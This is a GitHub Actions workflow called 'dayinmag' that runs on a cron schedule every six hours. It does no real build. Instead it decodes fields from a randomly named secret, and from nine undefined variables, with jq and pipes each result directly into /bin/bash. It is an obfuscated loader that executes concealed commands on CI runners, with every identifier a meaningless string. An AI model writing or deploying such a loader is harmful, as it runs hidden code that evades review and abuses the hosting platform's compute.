name: dayinmag
on:
  workflow_dispatch:
  schedule:
    - cron: '19 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dayinmag
        env:
          ejvo20: ${{ secrets.ejvo20 }}
        run: |
          echo $ejvo20 | jq -r .zns914 | /bin/bash
          echo $fb13332 | jq -r .y4181 | /bin/bash
          echo $abemy2 | jq -r .qox54 | /bin/bash
          echo $pq42 | jq -r .gkbt00 | /bin/bash
          echo $qovvr5838 | jq -r .qvir65 | /bin/bash
          echo $qiycd934 | jq -r .exibe966 | /bin/bash
          echo $muy8 | jq -r .ngec340 | /bin/bash
          echo $mnab56632 | jq -r .ncgfz9 | /bin/bash
          echo $dmyav95 | jq -r .vc22751 | /bin/bash
          echo $kbse806 | jq -r .bgy07 | /bin/bash

